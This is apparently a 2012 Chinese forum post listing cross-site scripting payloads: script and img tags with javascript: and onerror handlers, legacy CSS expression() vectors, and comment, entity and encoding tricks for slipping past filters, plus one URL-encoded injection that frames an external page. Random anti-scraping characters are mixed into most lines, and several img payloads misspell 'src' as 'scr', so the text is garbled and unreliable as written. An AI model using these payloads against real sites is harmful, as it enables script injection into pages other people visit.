<script>alert("跨站")</script> (最常用)
. Q* _( c, H( X& G2 Y( J) w<img scr=javascript:alert("跨站")></img>$ g) z6 t7 v8 A& R; }/ \+ P
<img scr="javascript: alert(/跨站/)></img>3 O3 T3 E7 s, n4 a
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格); o7 o# j# ]; B: j1 V0 E
<img scr="#" onerror=alert(/跨站/)></img>
" o: C, Z [, F- m8 b ], M<img scr="#" style="xss:expression(alert(/xss/));"></img>7 C6 k. M/ y" V7 ?% O( y+ N7 Y
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释). Q: s2 {7 h: H' N" P% i5 q1 l
<img src=vbscript:msgbox ("xss")></img>: m% ?- b6 Z A7 O$ q- Y
<style> input {left:expression (alert('xss'))}</style>) |0 X7 ]3 ~/ c2 E+ F" u
<div style={left:expression (alert('xss'))}></div>
9 _4 `/ R, f- t; W5 O1 u9 Q* b<div style={left:exp/* */ression (alert('xss'))}></div>: l9 V' T1 k& B5 N* d1 x
<div style={left:\0065\0078ression (alert('xss'))}></div>: T0 w- a/ @2 q1 l' J
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>& ]+ a/ z0 a( v/ H; q) ?. r
unicode <div style="{left:expRessioN (alert('xss'))}">
}7 f" W! r! c' |
& _/ O, _* ?. y0 l5 Q' F"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["# `- D2 z5 }! x5 f
|
发表于 2012-9-13 17:15:04
收藏
支持
反对